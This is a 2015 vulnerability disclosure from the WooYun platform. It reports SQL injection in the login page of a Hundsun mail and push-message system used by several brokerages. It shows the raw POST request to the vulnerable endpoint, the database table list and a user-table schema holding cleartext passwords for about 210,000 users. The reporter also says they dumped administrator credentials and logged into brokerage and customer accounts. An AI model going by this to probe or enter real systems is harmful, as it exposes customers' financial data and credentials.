当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0146171
漏洞标题:
恒生电子某重要系统漏洞(可影响数家券商\二十万用户数据\可推送消息给券商客户)
相关厂商:
hundsun.com
漏洞作者:
路人甲
提交时间:
2015-10-12 14:38
修复时间:
2015-11-30 18:18
公开时间:
2015-11-30 18:18
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
18
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

请向下看

详细说明:

此系统网址http://www.hs-post.com/,官网介绍如下:

屏幕快照 2015-10-12 13.48.00.png


登录功能存在POST注入

POST /igenus/login.php?Cmd=login HTTP/1.1
Host: www.hs-post.com
Proxy-Connection: keep-alive
Content-Length: 43
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.hs-post.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.hs-post.com/igenus/login.php?Cmd=error&Code=-1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,en-US;q=0.4
Cookie: LoginDomain=hundsun.com; PHPSESSID=vlclamq4inql9118005l9vkjo5
name=test&domain=hundsun.com&passwd=hundsun


数据库为vpopmail,19张表:

address
admin
auditLogs
auditLogs_copy
auditLogs_copy1
backupall
batchsend
card
dir_control
lastauth
logs
message
operLogs
personal
scheduler
stow
valias
vlog
vpopmail


登录账户密码等信息存放在vpopmail表中,共有210120条用户信息

+-----------------+-----------------+
| Column          | Type            |
+-----------------+-----------------+
| createtime      | timestamp       |
| pw_clear_passwd | varchar(16)     |
| pw_dir          | varchar(255)    |
| pw_domain       | varchar(64)     |
| pw_gecos        | varchar(48)     |
| pw_gid          | int(11)         |
| pw_id           | int(5) unsigned |
| pw_name         | varchar(32)     |
| pw_passwd       | varchar(40)     |
| pw_shell        | varchar(20)     |
| pw_uid          | int(11)         |
+-----------------+-----------------+


dump出各家券商postmaster的域和密码,密码信息打码

屏幕快照 2015-10-12 14.07.28.png


登录两个券商账户

屏幕快照 2015-10-12 13.31.19.png


屏幕快照 2015-10-12 13.35.58.png


登录客户账号看看融资融券信息,信息是最近的,可以证明系统正在使用中。

屏幕快照 2015-10-12 13.37.42.png

漏洞证明:

如上

修复方案:

请向上看

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-16 18:17

厂商回复:

非常感谢您的反馈,已进行处理。

最新状态:

暂无